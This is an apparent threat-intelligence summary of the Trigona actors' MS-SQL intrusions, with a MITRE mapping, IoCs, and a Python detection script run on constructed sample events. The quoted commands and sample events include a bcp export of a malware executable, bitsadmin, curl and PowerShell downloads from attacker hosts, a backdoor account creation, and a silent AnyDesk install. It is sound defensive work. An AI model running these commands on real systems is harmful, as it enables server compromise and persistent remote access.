Analysis of Trigona Threat Actor’s Latest Attack Cases


Trigona threat actors continue targeting exposed or weakly protected MS‑SQL servers, staging malware inside database tables and using BCP (bcp.exe) to write it out to disk, and employing tools such as AnyDesk, RDP, Teramind, a Rust‑written scanner, and various downloaders. ASEC observed reused Trigona infrastructure and provided IoCs (file hashes, URLs, and IPs) for the 2024 campaign. #Trigona #AnyDesk

Keypoints

  • Trigona operators attack MS‑SQL servers vulnerable to brute‑force and dictionary attacks, leveraging simple credentials or public exposure.
  • After gaining access, attackers run reconnaissance commands (hostname, whoami, systeminfo, tasklist, wmic useraccount, net user) and install additional payloads via CLR Shell and other methods.
  • Attackers use bcp.exe to export malware stored in database tables (e.g., table “uGnzBdZbsi” and format file “FODsOZKgAU.txt”) to local file paths.
  • Multiple download mechanisms observed: curl, bitsadmin, and PowerShell Invoke-WebRequest fetching executables and batch scripts from attacker-controlled hosts (e.g., 195.66.214[.]79 and cia[.]tf URL).
  • Remote control tools include AnyDesk, RDP (with created users like Remote99/Ladmin/erp2), and likely Teramind; AnyDesk installed to %ALLUSERSPROFILE% and manipulated via registry keys.
  • Newer malware includes a Rust‑written scanner that reports system and geolocation info to C2 and scans for RDP and MS‑SQL services, plus StressTester (Go) for SQLi and HTTP testing.
  • Additional malicious components: privilege escalation utilities, file‑deletion malware (Rust and batch), and payloads that replace executables in specific directories.

MITRE Techniques

  • [T1110] Brute Force – Attackers target MS‑SQL accounts with brute‑force and dictionary attacks against servers with weak credentials (“attacking MS-SQL servers that are vulnerable to brute-force and dictionary attacks because their accounts are configured with simple credentials”).
  • [T1059] Command and Scripting Interpreter – Use of commands and scripting (whoami, systeminfo, tasklist, wmic, powershell) for discovery and execution (the commands observed were “hostname”, “whoami”, “systeminfo”, “tasklist”, “wmic useraccount…”, and “powershell -Command "net user ladmin"”).
  • [T1005] Data from Local System – Exporting malware from a database binary column to a local file using BCP, i.e. staging the payload on disk rather than collecting data (“bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\spd.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"”; -T uses a trusted connection and -f names the non‑XML format file).
  • [T1105] Ingress Tool Transfer – Downloading additional payloads via curl, bitsadmin, and PowerShell Invoke-WebRequest (“curl hxxps://cia[.]tf/… -o …”, “bitsadmin /transfer … http://195.66.214[.]79/pci.exe”, “powershell Invoke-WebRequest -Uri “hxxp://195.66.214[.]79/L.bat”).
  • [T1021] Remote Services – Use of RDP and AnyDesk for remote access and control, including creating RDP users (“RDP was used to execute a batch file… add a user… Remote99 or Ladmin”; “%SystemDrive%/programdata/AD.exe --install …”, AnyDesk’s unattended install switch).
  • [T1218] Signed Binary Proxy Execution – Abuse of legitimate utilities like bcp.exe and bitsadmin to perform malicious actions (“the threat actor used BCP to store malware in the database and then create it as a file locally”; “bitsadmin /transfer …”).
  • [T1046] Network Service Discovery – Scanner malware (Rust) enumerates network services and sends system/IP/location info to C2 to identify RDP and MS‑SQL targets (“scanner … sends information about the infected system, including the IP and location information obtained through ‘ip-api.com’ … then performs scans … targets … RDP and MS-SQL”).
  • [T1490] Inhibit System Recovery – Malware that deletes files and directories in specific paths to hinder recovery and clean‑up (“malware that deletes directories in paths where the malware is installed… deletes the ‘.exe’ executable files in ‘C:\ProgramData’ and ‘C:\Users\Public\Music’”).
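The keypoints and the MITRE mapping above describe a chain that is easy to spot in process‑creation telemetry: sqlservr.exe spawning a shell, bcp.exe writing a binary column out to an executable path, bitsadmin/curl/Invoke-WebRequest pulling files from the listed hosts, net user … /add, and an unattended AnyDesk install. The following Python detector is an added example written for this page, not code from the ASEC article; it runs the corresponding rules over constructed Sysmon EID 1 / 4688‑style events. The sample events, the rule names, the T1136/T1219 labels for account creation and remote‑access software (the article itself maps these to T1021), the AnyDesk install directory and the cia[.]tf URL path (elided in the article) are all assumptions made for the demonstration.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon EID 1 / Windows 4688 style)."""
    parent_image: str
    image: str
    command_line: str

@dataclass(frozen=True)
class Finding:
    event_index: int
    rule: str
    technique: str

# Hosts from the IoC section, refanged once here so they match raw telemetry.
IOC_HOSTS = {"195.66.214.79", "179.43.159.186", "198.55.98.133", "cia.tf"}

# File extensions that make a bcp "queryout" suspicious: a legitimate export
# produces .dat/.csv/.txt, not a PE or a script.
EXEC_EXT = r"\.(?:exe|dll|bat|cmd|ps1|msi)\b"

# (rule name, technique, parent-image pattern or None, command-line pattern)
RULES = [
    ("sqlserver_spawned_shell", "T1059", r"sqlservr\.exe$",
     r"\b(?:cmd|powershell)(?:\.exe)?\b"),
    ("bcp_queryout_to_executable", "T1218", None,
     r"\bbcp(?:\.exe)?\b.*\bqueryout\b.*" + EXEC_EXT),
    ("bitsadmin_download", "T1105", None,
     r"\bbitsadmin(?:\.exe)?\b.*/transfer\b.*https?://"),
    ("curl_download", "T1105", None,
     r"\bcurl(?:\.exe)?\b.*https?://.*\s-o\b"),
    ("powershell_webrequest", "T1105", None,
     r"(?:invoke-webrequest|\biwr\b).*https?://"),
    ("local_account_added", "T1136", None,          # mapping assumed for this example
     r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b"),
    ("anydesk_silent_install", "T1219", None,       # mapping assumed for this example
     r"(?:\bAD\.exe\b|anydesk).*--install\b"),
]
COMPILED = [(n, t, re.compile(p, re.I) if p else None, re.compile(c, re.I))
            for n, t, p, c in RULES]

def detect(events):
    """Apply every rule to every event; also flag any command line naming an IoC host."""
    findings = []
    for idx, ev in enumerate(events):
        for name, technique, parent_re, cmd_re in COMPILED:
            if parent_re and not parent_re.search(ev.parent_image):
                continue
            if cmd_re.search(ev.command_line):
                findings.append(Finding(idx, name, technique))
        lowered = ev.command_line.lower()
        for host in sorted(IOC_HOSTS):
            if host in lowered:   # plain substring match; good enough for a demo
                findings.append(Finding(idx, "ioc_host_match:" + host, "IOC"))
    return findings

def techniques_seen(findings):
    """Set of technique IDs hit; several distinct IDs on one host means the chain, not noise."""
    return {f.technique for f in findings}

# Constructed sample events modelled on the commands quoted in the article (not real logs).
SAMPLE_EVENTS = [
    ProcEvent("sqlservr.exe", "cmd.exe",
              r'cmd.exe /c bcp "select binaryTable from uGnzBdZbsi" queryout "C:\ProgramData\spd.exe" -T -f "C:\ProgramData\FODsOZKgAU.txt"'),
    ProcEvent("sqlservr.exe", "cmd.exe",
              r'cmd.exe /c bitsadmin /transfer job1 http://195.66.214.79/pci.exe C:\ProgramData\pci.exe'),
    ProcEvent("cmd.exe", "powershell.exe",
              r'powershell Invoke-WebRequest -Uri "http://195.66.214.79/L.bat" -OutFile "C:\ProgramData\L.bat"'),
    ProcEvent("cmd.exe", "curl.exe",                 # URL path is hypothetical
              r'curl https://cia.tf/payload -o "C:\ProgramData\pci2.exe"'),
    ProcEvent("cmd.exe", "net.exe", r'net user Remote99 Passw0rd! /add'),
    ProcEvent("cmd.exe", "AD.exe",                   # install directory is assumed
              r'C:\programdata\AD.exe --install "C:\ProgramData\AnyDesk"'),
    ProcEvent("sqlservr.exe", "cmd.exe", r'cmd.exe /c whoami'),
    # Two benign bcp invocations that must NOT fire: plain table export and a CSV query export.
    ProcEvent("explorer.exe", "bcp.exe", r'bcp dbo.Orders out "C:\exports\orders.dat" -T -c'),
    ProcEvent("explorer.exe", "bcp.exe", r'bcp "select * from Sales" queryout "C:\exports\sales.csv" -T -c'),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"event {f.event_index}: {f.rule} [{f.technique}]")
```

The parent‑process constraint on the shell rule is what separates xp_cmdshell / CLR‑shell abuse from ordinary administrator activity; the bcp rule deliberately keys on the output extension so routine exports of .dat or .csv files stay quiet.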

Indicators of Compromise

  • [MD5] Suspicious payload hashes observed in the campaign – 2e4d250ecae8635fa3698eba5772a3b9, 3c21181c35d955f9e557417998c38942 (and 3 more hashes).
  • [URL] Malicious download and installer locations hosted on the attacker-controlled server – http[:]//195[.]66[.]214[.]79/AD[.]exe, http[:]//195[.]66[.]214[.]79/L[.]bat (and additional paths such as AD.msi, Monitor.exe, drivers.txt).
  • [IP] Command and control / hosting infrastructure – 179[.]43[.]159[.]186, 198[.]55[.]98[.]133 (used alongside 195[.]66[.]214[.]79, observed in the download URLs).
  • [File/Artifact] Database table and format file names used to store/export malware – table “uGnzBdZbsi”, format file “FODsOZKgAU.txt” (used in bcp export commands that create spd.exe, AD.exe, L.bat, and pci2.exe locally).


Read more: https://asec.ahnlab.com/en/90793/